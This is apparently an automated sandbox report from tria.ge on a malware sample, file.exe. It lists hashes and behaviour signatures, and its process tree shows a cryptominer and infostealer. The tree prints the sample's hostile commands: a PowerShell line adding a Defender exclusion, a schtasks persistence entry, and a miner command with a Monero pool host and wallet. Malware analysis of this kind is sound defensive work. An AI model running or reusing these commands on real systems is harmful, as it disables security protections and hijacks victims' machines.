Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
26/11/2022, 08:19
221126-j7yhtaed66 1025/11/2022, 12:27
221125-pmxnnsbe8t 824/11/2022, 09:51
221124-lvp21seh53 1024/11/2022, 09:44
221124-lqgvvahf3x 10Analysis
-
max time kernel
2707s -
max time network
2718s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
26/11/2022, 08:19
General
-
Target
file.exe
-
Size
1.4MB
-
MD5
073a3dc0c60492b618f888c5e603fd05
-
SHA1
4de52c57f8f032724452e901120bcf0fbee52902
-
SHA256
f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
-
SHA512
4262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
SSDEEP
24576:W+wHtwQBTvwpeNrT2i8k57TujjVx3KClNyOiY:W+sBTopej8Mw3NlNF
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Modifies system executable filetype association 2 TTPs 12 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 21 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 35 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Registers COM server for autorun 1 TTPs 64 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 43 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 4 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 15 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 11 IoCs
-
Drops desktop.ini file(s) 32 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Installs/modifies Browser Helper Object 2 TTPs 9 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 64 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
-
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 18 IoCs
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Modifies Control Panel 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 64 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 16 IoCs
-
NTFS ADS 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
-
Suspicious behavior: LoadsDriver 13 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookAW 11 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4249.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
-
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 4072 -ip 40721⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4072 -s 4881⤵
- Program crash
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffedac74f50,0x7ffedac74f60,0x7ffedac74f702⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1708 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1968 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4396 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4324 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4340 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4332 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4320 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4528 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4692 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2272 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2272 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5364 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5620 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5384 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3760 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3736 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3724 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3652 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5792 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5808 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4480 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2264 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6276 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6308 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6220 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6240 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6660 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6608 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6040 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,7951609280652658007,2192537163873979133,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:12⤵
-
-
